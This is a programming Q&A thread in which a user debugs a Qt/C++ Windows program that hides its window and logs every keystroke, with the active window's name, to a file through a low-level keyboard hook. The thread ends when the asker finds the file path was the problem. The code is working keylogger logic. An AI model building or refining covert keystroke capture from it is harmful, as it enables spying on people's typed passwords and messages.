# File writing with hidden window Qt c++

Tags: c++, windows, qt

I have a program that writes some things into a file with Qt.
It also outputs everything that is supposed to go in the file on console.

What I wanted to do was hide the window so that the process could run in background.
When I call the `hide()` method of my MainWindow, the console keeps displaying the data supposed to go in the file, but the file remains empty.

Note that I'm using fstream functions, not provided by Qt.

Where could the problem come from ?

I hide() my window when a button is clicked :

```
void MainWindow::on_pushButton_clicked()
{
    if (ui->editLogFilePath->text().length() > 0) {
        if (!(hHook = SetWindowsHookEx(idHook, mKeyboardProc, GetModuleHandle(NULL), threadId))) {
            qDebug() << "Hook failed !";
            return ;
        }
        else
            hide()
    }
}
```

}

I fill my file in the mKeyboardProc function :

```
static MainWindow *cur = NULL; // initialized to cur = this; in my constructor

LRESULT CALLBACK    mKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {

    LRESULT nextHook = CallNextHookEx(cur->getHook(), nCode, wParam, lParam);
    if (wParam == WM_KEYDOWN) {
        std::ofstream        out;

        out.open(cur->getUi()->editLogFilePath->text().toStdString().c_str(), std::ofstream::app);
        if (!out.is_open())
            qDebug() << "open file fail";
        else
            qDebug() << "open file success";
        KBDLLHOOKSTRUCT     cKey = *((KBDLLHOOKSTRUCT*) lParam);
        wchar_t             buffer[5];
        BYTE                keyboard_state[256];
        GetKeyboardState(keyboard_state);
        updateKeyState(keyboard_state, VK_SHIFT);
        updateKeyState(keyboard_state, VK_CAPITAL);
        updateKeyState(keyboard_state, VK_CONTROL);
        updateKeyState(keyboard_state, VK_MENU);

        HKL keyboard_layout = GetKeyboardLayout(0);

        char lpszName[0x100] = {0};
        DWORD   dwMsg = 1;
        dwMsg += cKey.scanCode << 16;
        dwMsg += cKey.flags << 24;
        buffer[4] = L'\0';
        ToUnicodeEx(cKey.vkCode, cKey.scanCode, keyboard_state, buffer, 4, 0, keyboard_layout);
        qDebug() << "Value : '" << QString::fromUtf16((ushort*)buffer) << "'  Key : '" << QString::fromUtf16((ushort*)lpszName) << "'";
        QString      toFile = "\tValue : '" + QString::fromUtf16((ushort*)buffer) + "' \tKey : '" + QString::fromUtf16((ushort*)lpszName) + "'";
        std::string  def = cur->checkWindowChange() + toFile.toStdString() + "\n";

        out << def;
        out.close();
    }
    return nextHook;
}
```

Thanks in advance (and sorry for the poor English)

Comment: Its hard to tell without knowing any details about how you do it. Please show us the related codes at least.

Comment: Apart from the craziness of opening and closing the file on *every* key event, I don't see anything wrong. Works for me as long as I plug `updateKeyState` with an empty function. You do have some buffer overflows lurking here :)

Comment: Actually, the craziness of that is to prevent the file from being deleted. It is recreated on a hook call. But thanks for the informations

Comment: I found the solution : I'm dumb.
I was building in release mode and was setting the path relatively.
Of course, the debug and release builds are not at the same place.